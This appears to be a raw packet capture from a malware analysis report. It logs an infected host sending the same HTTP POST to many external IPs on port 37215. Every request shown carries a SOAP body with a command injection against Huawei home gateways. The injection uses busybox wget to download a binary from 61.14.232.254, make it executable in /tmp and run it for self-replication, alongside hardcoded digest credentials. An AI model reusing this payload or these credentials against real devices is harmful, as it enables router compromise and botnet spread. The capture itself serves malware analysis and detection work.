                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2126192.168.2.134197677.44.89.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721590042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2127192.168.2.1358802197.189.255.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721636057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2128192.168.2.1351398157.226.80.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721656084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2129192.168.2.133735894.240.119.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721673012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2130192.168.2.135653241.102.232.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721693039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2131192.168.2.1351180157.189.100.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721746922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2132192.168.2.1354526157.3.121.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721899033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2133192.168.2.1337902157.50.87.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721910000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2134192.168.2.136074841.98.94.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721937895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2135192.168.2.1359634157.193.24.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722054005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 